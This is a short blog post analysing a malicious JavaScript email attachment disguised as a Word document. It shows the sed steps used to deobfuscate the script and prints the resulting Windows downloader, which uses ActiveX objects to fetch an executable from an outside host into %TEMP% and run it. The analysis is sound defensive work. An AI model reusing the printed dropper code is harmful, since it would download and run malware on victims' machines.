Deobfuscating Javascript

Today I came across some javascript madness inside of a file that initially appears as a Word Document in an email.  Below is a picture of some of the madness:

var a=''; var b=''; function lq() { b = 'eval'; a += 'ADODB'; tqk(); }; function j() { b = 'eval'; a += 's.Exp'; eky(); }; function ye() { b = 'eval'; a += 'ti'; xk(); }; function rbx() { b = 'eval'; a += '357'; dke(); }; function mx() { b = 'eval'; a += 'ment'; fr(); }; function jp() { b = 'eval'; a += '+St'; rxh(); }; function uuz() { b = 'eval'; a += ' ca'; d(); };

As you can tell little pieces of the actual code scattered everywhere.  To first deobfuscate the code I placed a line break between each semi-colon and new function.

cat file.txt | sed 's/function/\nfunction/g'

The above command just does a string substitution adding a new line in before the function call.  Then I noticed the variable b='eval' never changes.  So I removed it from the functions using sed once again:

cat newfile.txt | sed "s/b = 'eval';//"

Then after the code is assembled I knew it would execute in some fashion so looking through the code I found a line of this[b](a);.  I modified the line in the code to read document.write(a) and then in a sandbox ran the javascript.

The output of the deofuscated code came out to be the below code:

function dl(fr,fn,rn)
+++ var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+fn; var xo = new ActiveXObject("MSXML2.XMLHTTP"); xo.onreadystatechange = function() { if (xo.readyState === 4) { var xa = new ActiveXObject("ADODB.Stream"); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); xa.position = 0; xa.saveToFile(fn,2); xa.close(); }; }; try { xo.open("GET",fr,false); xo.send(); if (rn > 0) { ws.Run(fn,0,0); }; } catch (er) { }; }; dl("hyyp://cancumisa.com.mx/document.php?id=<random number>&rnd=<random number>","69923439.exe",1)

The above javascript will create a file in the temp directory using wscript called 69923439.exe if it can download the file located at the URL listed.

The goal of this post was to display the deobfuscation of the badness.




Comments

Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

VBA - Script to Download a file from a URL

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

IoT Malware Analysis - CnC Server - Part 3